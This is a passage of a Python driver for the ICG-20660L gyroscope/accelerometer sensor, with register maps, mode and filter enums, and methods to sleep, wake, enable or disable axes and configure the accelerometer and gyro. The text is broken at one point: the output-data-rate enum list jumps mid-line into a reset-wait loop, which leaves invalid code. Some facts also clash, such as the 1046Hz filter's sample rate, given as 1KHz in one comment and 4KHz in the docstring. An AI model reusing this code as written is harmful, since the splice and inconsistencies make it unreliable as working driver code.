OFFSET_ZA_ST = 0x01\n BIT_ACCEL_FS_SEL = 3\n OFFSET_ACCEL_FS_SEL = 0x03\n \n REG_ICG20660L_LP_MODE_CFG = 0x1E\n REG_ICG20660L_ACCEL_WOM_THR = 0x1F\n REG_ICG20660L_FIFO_EN = 0x23\n '''\n #FIFO_EN register:addr:0x23,acess:rw\n # --------------------------------------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # 
--------------------------------------------------------------------------------------\n # | TEMP_FIFO_EN | XG_FIFO_EN | YG_FIFO_EN | ZG_FIFO_EN | ACCEL_FIFO_EN | rsv |\n # --------------------------------------------------------------------------------------\n '''\n BIT_TEMP_FIFO_EN = 7\n OFFSET_TEMP_FIFO_EN = 0x01\n BIT_XG_FIFO_EN = 6\n OFFSET_XG_FIFO_EN = 0x01\n BIT_YG_FIFO_EN = 5\n OFFSET_YG_FIFO_EN = 0x01\n BIT_ZG_FIFO_EN = 4\n OFFSET_ZG_FIFO_EN = 0x01\n BIT_ACCEL_FIFO_EN = 3\n OFFSET_ACCEL_FIFO_EN = 0x01\n\n REG_ICG20660L_FSYNC_INT = 0x36\n REG_ICG20660L_INT_PIN_CFG = 0x37\n '''\n #INT_PIN_CFG register:addr:0x37,acess:rw\n # ------------------------------------------------------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # ------------------------------------------------------------------------------------------------------\n # | INT_LEVEL | INT_OPEN | LATCH_INT_EN | INT_RD_CLEAR | FSYNC_INT_LEVEL | FSYNC_INT_MODE_EN | rsv |\n # ------------------------------------------------------------------------------------------------------\n '''\n BIT_INT_LEVEL = 7\n OFFSET_INT_LEVEL = 0x01\n BIT_INT_OPEN = 6\n OFFSET_INT_OPEN = 0x01\n BIT_LATCH_INT_EN = 5\n OFFSET_LATCH_INT_EN = 0x01\n BIT_INT_RD_CLEAR = 4\n OFFSET_INT_RD_CLEAR = 0x01\n BIT_FSYNC_INT_LEVEL = 3\n OFFSET_FSYNC_INT_LEVEL = 0x01\n BIT_FSYNC_INT_MODE_EN = 2\n OFFSET_FSYNC_INT_MODE_EN = 0x01\n \n REG_ICG20660L_INT_STATUS = 0x3A\n REG_ICG20660L_ACCEL_XOUT_H = 0x3B\n REG_ICG20660L_ACCEL_XOUT_L = 0x3C\n REG_ICG20660L_ACCEL_YOUT_H = 0x3D\n REG_ICG20660L_ACCEL_YOUT_L = 0x3E\n REG_ICG20660L_ACCEL_ZOUT_H = 0x3F\n REG_ICG20660L_ACCEL_ZOUT_L = 0x40\n REG_ICG20660L_TEMP_OUT_H = 0x41\n REG_ICG20660L_TEMP_OUT_L = 0x42\n REG_ICG20660L_GYRO_XOUT_H = 0x43\n REG_ICG20660L_GYRO_XOUT_L = 0x44\n REG_ICG20660L_GYRO_YOUT_H = 0x45\n REG_ICG20660L_GYRO_YOUT_L = 0x46\n REG_ICG20660L_GYRO_ZOUT_H = 0x47\n REG_ICG20660L_GYRO_ZOUT_L = 0x48\n REG_ICG20660L_SIGNAL_PATH_RESET = 0x68\n REG_ICG20660L_ACCEL_INTEL_CTRL = 0x69\n '''\n #ACCEL_INTEL_CTRL register:addr:0x69,acess:rw\n # ----------------------------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # ----------------------------------------------------------------------------\n # | ACCEL_INTEL_EN | ACCEL_INTEL_MODE | rsv | WOM_TH_MODE |\n # ----------------------------------------------------------------------------\n '''\n BIT_ACCEL_INTEL_EN = 7\n OFFSET_ACCEL_INTEL_EN = 0x01\n BIT_ACCEL_INTEL_MODE = 6\n OFFSET_ACCEL_INTEL_MODE = 0x01\n BIT_WOM_TH_MODE = 0\n OFFSET_WOM_TH_MODE = 0x01\n \n REG_ICG20660L_USER_CTRL = 0x6A\n '''\n #USER_CTRL register:addr:0x6A,acess:rw\n # -------------------------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # -------------------------------------------------------------------------\n # | rsv | FIFO_EN | rsv | I2C_IF_DIS | rsv | FIFO_RST | rsv | SIG_COND_RST|\n # -------------------------------------------------------------------------\n '''\n BIT_FIFO_EN = 6\n OFFSET_FIFO_EN = 0x01\n BIT_I2C_IF_DIS = 4\n OFFSET_I2C_IF_DIS = 0x01\n BIT_FIFO_RST = 2\n OFFSET_FIFO_RST = 0x01\n BIT_SIG_COND_RST = 0\n OFFSET_SIG_COND_RST = 0x01\n \n REG_ICG20660L_WHO_AM_I = 0x75\n REG_ICG20660L_XA_OFFSET_H = 0x77\n REG_ICG20660L_XA_OFFSET_L = 0x78\n REG_ICG20660L_YA_OFFSET_H = 0x7A\n REG_ICG20660L_YA_OFFSET_L = 0x7B\n REG_ICG20660L_ZA_OFFSET_H = 0x7D\n REG_ICG20660L_ZA_OFFSET_L = 0x7E\n \n RAW_DATA_AX_H_INDEX = 0x00\n RAW_DATA_AX_L_INDEX = 0x01\n 
RAW_DATA_AY_H_INDEX = 0x02\n    RAW_DATA_AY_L_INDEX = 0x03\n    RAW_DATA_AZ_H_INDEX = 0x04\n    RAW_DATA_AZ_L_INDEX = 0x05\n    RAW_DATA_T_H_INDEX = 0x06\n    RAW_DATA_T_L_INDEX = 0x07\n    RAW_DATA_GX_H_INDEX = 0x08\n    RAW_DATA_GX_L_INDEX = 0x09\n    RAW_DATA_GY_H_INDEX = 0x0A\n    RAW_DATA_GY_L_INDEX = 0x0B\n    RAW_DATA_GZ_H_INDEX = 0x0C\n    RAW_DATA_GZ_L_INDEX = 0x0D\n    RAW_DATA_LENGTH = 14\n    \n    ICG20660L_WOM_XYZ_INT = 7 << 5\n    \n    BIT_FIFO_LOW_EN = 7\n    OFFSET_FIFO_LOW_EN = 0x01\n    BIT_TEMP = 6\n    OFFSET_TEMP = 0x01\n    BIT_ACCEL_X = 5\n    OFFSET_ACCEL_X = 0x01\n    BIT_ACCEL_Y = 4\n    OFFSET_ACCEL_Y = 0x01\n    BIT_ACCEL_Z = 3\n    OFFSET_ACCEL_Z = 0x01\n    BIT_GYRO_X = 2\n    OFFSET_GYRO_X = 0x01\n    BIT_GYRO_Y = 1\n    OFFSET_GYRO_Y = 0x01\n    BIT_GYRO_Z = 0\n    OFFSET_GYRO_Z = 0x01\n\n    _data_mode = 0\n    _mode = 2\n    _level = GPIO.LOW\n    _fifo_frame_size = 0\n    _accel_scale = ADC_MAX_RANGE/ACCEL_FULL_SCALE_16G\n    _accel_range = ACCEL_FULL_SCALE_16G\n    _gyro_scale = ADC_MAX_RANGE/GYRO_FULL_SCALE_500DPS\n    _gyro_range = GYRO_FULL_SCALE_500DPS\n    _raw_data = [0]*14\n    _update = 0\n\n    ## gyro: off, accel:off, low power consumption about 70uA\n    eSLEEP_MODE = 0 \n    ## gyro: off, accel:duty_cycled, consumption about 1.5mA \n    eACCEL_LOW_POWER_MODE = 1 \n    ## gyro: on, accel:on, consumption about 3.3mA\n    eSIX_AXIS_LOW_NOISE_MODE = 2 \n    \n    ## Read sensor data from data register.\n    eREG_MODE = 0 \n    ## Read sensor data from 512 bytes FIFO.\n    eFIFO_MODE = 1 \n    \n    ## The full scale range of gyro: 0~±125dps, 1dps = Π/180° rad/s, Π = 3.1415926.\n    eFSR_G_125DPS = 0 \n    ## The full scale range of gyro: 0~±250dps, 1dps = Π/180° rad/s, Π = 3.1415926.\n    eFSR_G_250DPS = 1 \n    ## The full scale range of gyro: 0~±500dps, 1dps = Π/180° rad/s, Π = 3.1415926.  \n    eFSR_G_500DPS = 2 \n    \n    ## The full scale range of accel: 0~±2g, 1g = 9.80665 m/s².\n    eFSR_A_2G = 0 \n    ## The full scale range of accel: 0~±4g, 1g = 9.80665 m/s².  \n    eFSR_A_4G = 1 \n    ## The full scale range of accel: 0~±8g, 1g = 9.80665 m/s².  \n    eFSR_A_8G = 2 \n    ## The full scale range of accel: 0~±16g, 1g = 9.80665 m/s².\n    eFSR_A_16G = 3 \n    \n    ## The bit is gyro's z axis, you can call enableSensor or disableSensor function to enable or disable the gyro's Z axis.\n    eGYRO_AXIS_Z = 1 << 6 | 1 << 0 \n    ## The bit is gyro's y axis, you can call enableSensor or disableSensor function to enable or disable the gyro's Y axis.  \n    eGYRO_AXIS_Y = 1 << 6 | 1 << 1 \n    ## The bit is gyro's x axis, you can call enableSensor or disableSensor function to enable or disable the gyro's X axis.  \n    eGYRO_AXIS_X = 1 << 6 | 1 << 2 \n    ## The bit is accel's z axis, you can call enableSensor or disableSensor function to enable or disable the accel's Z axis.  \n    eACCEL_AXIS_Z = 3 \n    ## The bit is accel's Y axis, you can call enableSensor or disableSensor function to enable or disable the accel's Y axis.  \n    eACCEL_AXIS_Y = 4\n    ## The bit is accel's X axis, you can call enableSensor or disableSensor function to enable or disable the accel's X axis.  \n    eACCEL_AXIS_X = 5 \n    ## The bits of gyro's xyz axis, you can call enableSensor or disableSensor function to enable or disable the gyro's xyz axis.  \n    eGYRO_AXIS_XYZ = 1 << 6 | 0X07 \n    ## The bits of accel's xyz axis, you can call enableSensor or disableSensor function to enable or disable the accel's xyz axis.  \n    eACCEL_AXIS_XYZ = 0X07 << 3 \n    ## The gyro's and accel's xyz axis, you can call enableSensor or disableSensor function to enable or disable the accel's and gyro's xyz axis. 
\n eAXIS_ALL = 1 << 6 | 0X3F \n ## The bits of six-axis temperature, you can call enableSensor or disableSensor function to enable or disable the temperature. \n eTEMPERATURE = 1 << 6 \n ## The bits of fifo low power enable bit. \n eFIFO_LOW_POWER_EN = 1<< 7 \n \n ## When the signal is equal to or greater than 8173Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 32KHz.\n eGYRO_DLPF_8173_32KHZ = 0 \n ## When the signal is equal to or greater than 3281Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 32KHz.\n eGYRO_DLPF_3281_32KHZ = 1 \n ## When the signal is equal to or greater than 250Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 8KHz.\n eGYRO_DLPF_250_8KHZ = 2 \n ## When the signal is equal to or greater than 176Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz\n eGYRO_DLPF_176_1KHZ = 3 \n ## When the signal is equal to or greater than 92Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eGYRO_DLPF_92_1KHZ = 4 \n ## When the signal is equal to or greater than 3281Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 8KHz.\n eGYRO_DLPF_3281_8KHZ = 5 \n \n ## When the signal is less than or equal to 5Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_5_1KHZ = 0 \n ## When the signal is less than or equal to 10Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_10_1KHZ = 1 \n ## When the signal is less than or equal to 21Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_21_1KHZ = 2 \n ## When the signal is less than or equal to 44Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_44_1KHZ = 3 \n ## When the signal is less than or equal to 99Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_99_1KHZ = 4 \n ## This configuration also supports low power consumption. When the signal is less than or equal to 218Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz. \n eACCEL_DLPF_218_1KHZ = 5 \n ## This configuration also supports low power consumption. When the signal is less than or equal to 420Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_420_1KHZ = 6 \n ## This configuration also supports low power consumption. When the signal is less than or equal to 1046Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_1046_4KHZ = 7 \n ## This configuration only supports low power consumption. When the signal is less than or equal to 55Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_55_1KHZ = 8 \n ## This configuration only supports low power consumption. When the signal is less than or equal to 110Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz. 
\n eACCEL_DLPF_110_1KHZ = 9 \n \n ## the low power accel Output Data Rate: 0.24Hz\n eODR_0_24HZ = 0 \n ## the low power accel Output Data Rate: 0.49Hz\n eODR_0_49HZ = 1 \n ## the low power accel Output Data Rate: 0.98Hz\n eODR_0_98HZ = 2 \n ## the low power accel Output Data Rate: 1.95Hz\n eODR_1_95HZ = 3 \n ## the low power accel Output Data Rate: 3.91Hz \n eODR_3_91HZ = 4 \n ## the low power accel Output Data Rate: 7.81Hz \n eODR_7_81HZ = 5 \n ## the low power accel Output Data Rate: 15.63Hz\n eODR_15_63HZ = 6 \n ## the low power accel Output Data Rate: 31.25Hz \n eODR_31_25HZ = 7 \n ## the low power accel Output Data Rate: 62.50Hz\n eODR_62_50HZ = 8 \n ## the low power accel Output Data Rate: 125Hz\n eODR_125HZ = 9 \n ## the low power accel Output Data Rate: 250Hz \n eODR_250HZ = 10 \n ## = wait_for_timeout_ms:\n break\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 1)\n if len(rslt) == 1:\n if self._get_reg_bit_value(rslt[0], self.BIT_DEVICE_RESET, self.OFFSET_DEVICE_RESET) == 0:\n break\n \n \n def sleep(self):\n '''!\n @brief Enter sleep mode, it will reduce power consumption, and The gyroscope and acceleration will stop working. \n @n You need to call wakeup function to wake up sensor.\n '''\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 1)\n if len(rslt) == 1:\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_SLEEP, self.OFFSET_SLEEP, 1)\n else:\n return None\n self._write_bytes(self.REG_ICG20660L_PWR_MGMT_1, [rslt])\n time.sleep(0.1)\n\n def wakeup(self):\n '''!\n @brief Waking up sensor from sleep, and you will restore the configuration before sleep.\n '''\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 1)\n #print(\"rslt=%#x\"%rslt[0])\n if len(rslt) == 1:\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_SLEEP, self.OFFSET_SLEEP, 0)\n #print(\"rslt=%#x\"%rslt)\n else:\n return None\n \n self._write_bytes(self.REG_ICG20660L_PWR_MGMT_1, [rslt])\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 1)\n #print(\"rslt=%#x\"%rslt[0])\n time.sleep(1)\n\n def enable_sensor(self, bit):\n '''!\n @brief Enable sensor, including Accel of xyz axis, Gyro of xyz, temperature and fifo low power enable bit. \n @param bit: 8-bit byte data. 
Each bit represents enabling a function bit, as shown in the following table:\n        @n -------------------------------------------------------------------------------------------------------------------\n        @n |    bit7   |    bit6   |    bit5     |    bit4     |    bit3     |    bit2    |    bit1    |    bit0    |\n        @n -------------------------------------------------------------------------------------------------------------------\n        @n |  reserve  |  reserve  |eACCEL_AXIS_X|eACCEL_AXIS_Y|eACCEL_AXIS_Z|eGYRO_AXIS_X|eGYRO_AXIS_Y|eGYRO_AXIS_Z|\n        @n |           |           |            eACCEL_AXIS_XYZ             |          eGYRO_AXIS_XYZ             |\n        @n |           |           |                              eAXIS_ALL                                       |\n        @n -------------------------------------------------------------------------------------------------------------------\n        @n bit0: Z-axis of gyro and temperature.\n        @n bit1: Y-axis of gyro and temperature.\n        @n bit2: X-axis of gyro and temperature.\n        @n bit3: Z-axis of acceleration.\n        @n bit4: Y-axis of acceleration.\n        @n bit5: X-axis of acceleration.\n        @n bit6: reserve.\n        @n bit7: reserve.\n        @note Enabling any axis of the gyroscope will automatically enable the on-board temperature sensor.\n        @n eGYRO_AXIS_Z: The bit0 of the bit, enable gyro's z axis and temperature.\n        @n eGYRO_AXIS_Y: The bit1 of the bit, enable gyro's y axis and temperature.\n        @n eGYRO_AXIS_X: The bit2 of the bit, enable gyro's X axis and temperature.\n        @n eACCEL_AXIS_Z: The bit3 of the bit, enable accel's z axis.\n        @n eACCEL_AXIS_Y: The bit4 of the bit, enable Accel's y axis.\n        @n eACCEL_AXIS_X: The bit5 of the bit, enable Accel's X axis.\n        @n eGYRO_AXIS_XYZ or eGYRO_AXIS_X|eGYRO_AXIS_Y|eGYRO_AXIS_Z: The bit0/bit1/bit2 of the bit, enable gyro's xyz axis and temperature.\n        @n eACCEL_AXIS_XYZ or eACCEL_AXIS_X|eACCEL_AXIS_Y|eACCEL_AXIS_Z: The bit3/bit4/bit5 of the bit, enable Accel's xyz axis.\n        @n eAXIS_ALL or eGYRO_AXIS_Z|eGYRO_AXIS_Y|eGYRO_AXIS_X|eACCEL_AXIS_Z|eACCEL_AXIS_Y|eACCEL_AXIS_X: The bit0/bit1/bit2/bit3/bit4/bit5 of the bit, enable temperature, Accel's and gyro's xyz axis. 
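\n        @n Example (illustrative, added; the instance name icg is assumed): icg.enable_sensor(icg.eGYRO_AXIS_XYZ | icg.eACCEL_AXIS_XYZ) enables all six axes, and the temperature sensor comes up along with the gyro.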
\n '''\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 2)\n #print(\"REG_ICG20660L_PWR_MGMT_1=%#X\"%rslt[0])\n #print(\"REG_ICG20660L_PWR_MGMT_2=%#X\"%rslt[1])\n if len(rslt) == 2:\n if self._get_reg_bit_value(bit, self.BIT_FIFO_LOW_EN, self.OFFSET_FIFO_LOW_EN):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_FIFO_LP_EN, self.OFFSET_FIFO_LP_EN, 1)\n\n if self._get_reg_bit_value(bit, self.BIT_TEMP, self.OFFSET_TEMP):\n rslt[0] = self._update_reg_bit_value(rslt[0], self.BIT_TEMP_DIS, self.OFFSET_TEMP_DIS, 0)\n\n if self._get_reg_bit_value(bit, self.BIT_ACCEL_X, self.OFFSET_ACCEL_X):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_XA, self.OFFSET_STBY_XA, 0)\n\n if self._get_reg_bit_value(bit, self.BIT_ACCEL_Y, self.OFFSET_ACCEL_Y):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_YA, self.OFFSET_STBY_YA, 0)\n\n if self._get_reg_bit_value(bit, self.BIT_ACCEL_Z, self.OFFSET_ACCEL_Z):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_ZA, self.OFFSET_STBY_ZA, 0)\n\n if self._get_reg_bit_value(bit, self.BIT_GYRO_X, self.OFFSET_GYRO_X):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_XG, self.OFFSET_STBY_XG, 0)\n\n if self._get_reg_bit_value(bit, self.BIT_GYRO_Y, self.OFFSET_GYRO_Y):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_YG, self.OFFSET_STBY_YG, 0)\n\n if self._get_reg_bit_value(bit, self.BIT_GYRO_Z, self.OFFSET_GYRO_Z):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_ZG, self.OFFSET_STBY_ZG, 0)\n \n if self._data_mode == self.eFIFO_MODE:\n self._enable_fifo(True, True, True, True, True)\n else:\n self._enable_fifo(False, False, False, False, False)\n self._write_bytes(self.REG_ICG20660L_PWR_MGMT_1, rslt)\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 2)\n #print(\"REG_ICG20660L_PWR_MGMT_2=%#X\"%rslt[1])\n #print(\"REG_ICG20660L_PWR_MGMT_1=%#X\"%rslt[0])\n\n def disable_sensor(self, bit):\n '''!\n @brief Disable sensor, including Accel of xyz axis, Gyro of xyz, temperature and fifo low power enable bit. \n @param bit: 8-bit byte data. 
Each bit represents enabling a function bit, as shown in the following table:\n        @n -------------------------------------------------------------------------------------------------------------------\n        @n |    bit7   |    bit6   |    bit5     |    bit4     |    bit3     |    bit2    |    bit1    |    bit0    |\n        @n -------------------------------------------------------------------------------------------------------------------\n        @n |  reserve  |  reserve  |eACCEL_AXIS_X|eACCEL_AXIS_Y|eACCEL_AXIS_Z|eGYRO_AXIS_X|eGYRO_AXIS_Y|eGYRO_AXIS_Z|\n        @n |           |           |            eACCEL_AXIS_XYZ             |          eGYRO_AXIS_XYZ             |\n        @n |           |           |                              eAXIS_ALL                                       |\n        @n -------------------------------------------------------------------------------------------------------------------\n        @n bit0: Z-axis of gyro and temperature.\n        @n bit1: Y-axis of gyro and temperature.\n        @n bit2: X-axis of gyro and temperature.\n        @n bit3: Z-axis of acceleration.\n        @n bit4: Y-axis of acceleration.\n        @n bit5: X-axis of acceleration.\n        @n bit6: reserve.\n        @n bit7: reserve.\n        @note The temperature sensor is turned off only when the X, Y, and Z axes of the gyroscope are all disabled.\n        @n Turning on any axis will keep the temperature sensor from being turned off.\n        @n eGYRO_AXIS_Z: The bit0 of the bit, disable gyro's z axis and temperature.\n        @n eGYRO_AXIS_Y: The bit1 of the bit, disable gyro's y axis and temperature.\n        @n eGYRO_AXIS_X: The bit2 of the bit, disable gyro's X axis and temperature.\n        @n eACCEL_AXIS_Z: The bit3 of the bit, disable accel's z axis.\n        @n eACCEL_AXIS_Y: The bit4 of the bit, disable Accel's y axis.\n        @n eACCEL_AXIS_X: The bit5 of the bit, disable Accel's X axis.\n        @n eGYRO_AXIS_XYZ or eGYRO_AXIS_X|eGYRO_AXIS_Y|eGYRO_AXIS_Z: The bit0/bit1/bit2 of the bit, disable gyro's xyz axis and temperature.\n        @n eACCEL_AXIS_XYZ or eACCEL_AXIS_X|eACCEL_AXIS_Y|eACCEL_AXIS_Z: The bit3/bit4/bit5 of the bit, disable Accel's xyz axis.\n        @n eAXIS_ALL or eGYRO_AXIS_Z|eGYRO_AXIS_Y|eGYRO_AXIS_X|eACCEL_AXIS_Z|eACCEL_AXIS_Y|eACCEL_AXIS_X: The bit0/bit1/bit2/bit3/bit4/bit5 of the bit, disable temperature, Accel's and gyro's xyz axis. 
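\n        @n Example (illustrative, added): icg.disable_sensor(icg.eACCEL_AXIS_XYZ) puts only the accelerometer axes into standby; the gyro axes and the temperature sensor stay active.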
\n '''\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 2)\n if self._get_reg_bit_value(bit, self.BIT_FIFO_LOW_EN, self.OFFSET_FIFO_LOW_EN):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_FIFO_LP_EN, self.OFFSET_FIFO_LP_EN, 0)\n\n if self._get_reg_bit_value(bit, self.BIT_TEMP, self.OFFSET_TEMP):\n rslt[0] = self._update_reg_bit_value(rslt[0], self.BIT_TEMP_DIS, self.OFFSET_TEMP_DIS, 1)\n\n if self._get_reg_bit_value(bit, self.BIT_ACCEL_X, self.OFFSET_ACCEL_X):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_XA, self.OFFSET_STBY_XA, 1)\n\n if self._get_reg_bit_value(bit, self.BIT_ACCEL_Y, self.OFFSET_ACCEL_Y):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_YA, self.OFFSET_STBY_YA, 1)\n\n if self._get_reg_bit_value(bit, self.BIT_ACCEL_Z, self.OFFSET_ACCEL_Z):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_ZA, self.OFFSET_STBY_ZA, 1)\n\n if self._get_reg_bit_value(bit, self.BIT_GYRO_X, self.OFFSET_GYRO_X):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_XG, self.OFFSET_STBY_XG, 1)\n\n if self._get_reg_bit_value(bit, self.BIT_GYRO_Y, self.OFFSET_GYRO_Y):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_YG, self.OFFSET_STBY_YG, 1)\n\n if self._get_reg_bit_value(bit, self.BIT_GYRO_Z, self.OFFSET_GYRO_Z):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_ZG, self.OFFSET_STBY_ZG, 1)\n \n if self._data_mode == self.eFIFO_MODE:\n self._enable_fifo(True, True, True, True, True)\n else:\n self._enable_fifo(False, False, False, False, False)\n if (self._get_reg_bit_value(rslt[1], self.BIT_GYRO_X, self.OFFSET_GYRO_X) == 0) or (self._get_reg_bit_value(rslt[1], self.BIT_GYRO_Z, self.OFFSET_GYRO_Z) == 0) or (self._get_reg_bit_value(rslt[1], self.BIT_GYRO_Y, self.OFFSET_GYRO_Y) == 0):\n rslt[0] = self._update_reg_bit_value(rslt[0], self.BIT_TEMP_DIS, self.OFFSET_TEMP_DIS, 0)\n\n self._write_bytes(self.REG_ICG20660L_PWR_MGMT_1, rslt)\n\n def config_accel(self,scale, bd, odr = 0, low_power_flag = False):\n '''!\n @brief Config of accel's full scale, dlpf bandwidth and internal sample rate. \n @param scale The full scale of accel, unit: g(1g = 9.80665 m/s²).\n @n eFSR_A_2G: The full scale range is ±2g.\n @n eFSR_A_4G: The full scale range is ±4g.\n @n eFSR_A_8G: The full scale range is ±8g.\n @n eFSR_A_16G: The full scale range is ±16g.\n @param bd Set 3-db bandwidth.\n @n eACCEL_DLPF_5_1KHZ or 0: When the signal is less than or equal to 5Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n @n eACCEL_DLPF_10_1KHZ or 1: When the signal is less than or equal to 10Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n @n eACCEL_DLPF_21_1KHZ or 2: When the signal is less than or equal to 21Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n @n eACCEL_DLPF_44_1KHZ or 3: When the signal is less than or equal to 44Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n @n eACCEL_DLPF_99_1KHZ or 4: When the signal is less than or equal to 99Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n @n eACCEL_DLPF_218_1KHZ or 5: When the signal is less than or equal to 218Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz. 
@n Support low power consumption mode\n @n eACCEL_DLPF_420_1KHZ or 6: When the signal is less than or equal to 420Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz. @n Support low power consumption mode\n @n eACCEL_DLPF_1046_4KHZ or 7: When the signal is less than or equal to 1046Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 4KHz. @n Support low power consumption mode\n @n eACCEL_DLPF_55_1KHZ or 8: When the signal is less than or equal to 55Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz. @n Only support low power consumption mode\n @n eACCEL_DLPF_110_1KHZ or 9: When the signal is less than or equal to 110Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz. @n Only support low power consumption mode\n @note When the gyroscope and accelerometer are both enabled, if the sensor data is read through the FIFO,\n @n the internal sampling rate of the gyroscope and accelerometer must be the same.\n @param odr: Set the frequency of waking up the chip to take a sample of accel data – the low power accel Output Data Rate.\n @n eODR_125HZ or 9: The low power accel Output Data Rate: 125Hz\n @n eODR_250HZ or 10: The low power accel Output Data Rate: 250Hz\n @n eODR_500HZ or 11: The low power accel Output Data Rate: 500Hz\n @param low_power_flag: Whether to configure the Acceleration to low power mode.\n @n True: Enter low power mode.\n @n False: Not configure the Acceleration to low power mode.(default)\n '''\n if low_power_flag:\n self._mode = self.eACCEL_LOW_POWER_MODE\n else:\n self._mode = self.eSIX_AXIS_LOW_NOISE_MODE\n self._set_full_scale_for_accel(scale)\n self._set_bandwidth_for_accel(bd)\n self._write_bytes(self.REG_ICG20660L_LP_MODE_CFG, [odr])\n\n def config_gyro(self, scale, bd):\n '''!\n @brief Config of gyro's full scale, dlpf bandwidth and internal sample rate. 
\n        @param scale The full scale of gyro, unit: dps(Degrees per second).\n        @n eFSR_G_125DPS: The full scale range is ±125 dps.\n        @n eFSR_G_250DPS: The full scale range is ±250 dps.\n        @n eFSR_G_500DPS: The full scale range is ±500 dps.\n        @param bd Set 3-db bandwidth.\n        @n eGYRO_DLPF_8173_32KHZ: When the signal is equal to or greater than 8173Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 32KHz.\n        @n eGYRO_DLPF_3281_32KHZ: When the signal is equal to or greater than 3281Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 32KHz.\n        @n eGYRO_DLPF_250_8KHZ: When the signal is equal to or greater than 250Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 8KHz.\n        @n eGYRO_DLPF_176_1KHZ: When the signal is equal to or greater than 176Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n        @n eGYRO_DLPF_92_1KHZ: When the signal is equal to or greater than 92Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n        @n eGYRO_DLPF_3281_8KHZ: When the signal is equal to or greater than 3281Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 8KHz.\n        @note When the gyroscope and accelerometer are both enabled, if the sensor data is read through the FIFO, \n        @n the internal sampling rate of the gyroscope and accelerometer must be the same.\n        '''\n        self._set_full_scale_for_gyro(scale)\n        self._set_bandwidth_for_gyro(bd)\n\n\n    def set_sample_div(self, div):\n        '''!\n        @brief Set sample rate divider. \n        @param div Sample rate divider, the range is 0~255.\n        @n Sampling rate = internal sampling rate/(div+1)\n        @note If the accelerometer configuration is in low power consumption mode, that is, the formal parameter lowPowerFlag of the configAccel function is true, \\\n        @n the sampling rate must match the output rate of the formal parameter odr of configAccel, as shown in the following table:\n        @n ----------------------------------------------------------------------------\n        @n |        config_accel       |        set_sample_div      |\n        @n ----------------------------------------------------------------------------|\n        @n |     bd      |     odr     | lowPowerFlag |     div     |\n        @n ----------------------------------------------------------------------------|\n        @n |      X      |      X      |    